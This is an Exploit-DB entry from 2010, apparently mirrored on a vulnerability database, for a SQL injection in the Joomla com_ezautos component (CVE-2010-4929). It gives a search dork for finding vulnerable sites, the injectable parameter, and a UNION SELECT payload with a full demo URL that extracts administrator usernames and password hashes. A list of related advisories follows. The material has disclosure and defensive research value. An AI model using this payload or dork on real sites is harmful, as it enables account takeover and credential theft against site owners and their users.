Lucene search
GamoscuEDB-ID:15085HistorySep 22, 2010 - 12:00 a.m.
Joomla! Component Joostina - SQL Injection
2010-09-2200:00:00
Gamoscu
www.exploit-db.com
38
#
# Note: This does not affect the current version of this component. It was patched more than 15 months ago.
#
#
Joomla (joostina) Component com_ezautos SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.1923turk.com
Blog :http://gamoscu.wordpress.com/
Script : Joomla http://www.joostina-cms.org/content/view/20/35/
Dork : inurl:com_ezautos
###########################
[ Vulnerable File ]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]
[ XpL ]
+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
[ Demo]
http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58 Delibey Tiamo Psiko Turco infazci X-TRO
#
#
#
# #Elektrikist#
#
#############################################Related
prion
prion
Sql injection
2011-10-09 10:55:00
cvelist
cvelist
CVE-2010-4929
2011-10-09 10:00:00
cve
cve
CVE-2010-4929
2011-10-09 10:55:21
nvd
nvd
CVE-2010-4929
2011-10-09 10:55:21
checkpoint_advisories
checkpoint_advisories
Joomla Component com_ezautos SQL Injection (CVE-2010-4929)
2014-11-10 00:00:00
openvas
openvas
Joomla Multiple Components SQL Injection Vulnerabilities
2011-11-03 00:00:00
Joomla Multiple Components SQL Injection Vulnerabilities
2011-11-03 00:00:00